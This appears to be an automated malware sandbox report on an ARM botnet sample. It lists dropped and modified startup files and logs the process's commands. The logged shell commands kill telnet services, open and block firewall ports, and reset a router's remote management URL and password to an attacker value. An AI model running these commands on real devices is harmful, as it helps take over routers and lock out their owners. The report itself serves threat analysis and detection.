IOCReport

loading gif

Files

File Path
Type
Category
Malicious
KnAY2OIPI3
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
 malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
 malicious
/etc/init.d/hostname.sh
ASCII text
dropped
 malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall.sh
ASCII text
dropped
 malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
 malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
 malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
 malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
 malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
 malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
 malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
 malicious
/etc/rc.local
ASCII text
dropped
 malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/usr/bin/gettext.sh
ASCII text
dropped
 malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
 malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
 malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
 clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
 clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
 clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/undock.sh
ASCII text
dropped
 clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
 clean
/tmp/.config
ASCII text
dropped
 clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
 clean
/usr/share/alsa/utils.sh
ASCII text
dropped
 clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
 clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
 clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
 clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
 clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
 clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
 clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
 clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
 clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
 clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
 clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
 clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
 clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
 clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
 clean
/usr/share/os-prober/common.sh
ASCII text
dropped
 clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
 clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
 clean
There are 212 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/KnAY2OIPI3
/usr/bin/qemu-arm /tmp/KnAY2OIPI3
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
 clean
/bin/sh
n/a
 clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
 clean
/sbin/iptables
n/a
 clean
/sbin/modprobe
/sbin/modprobe ip_tables
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p udp --dport 18022 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
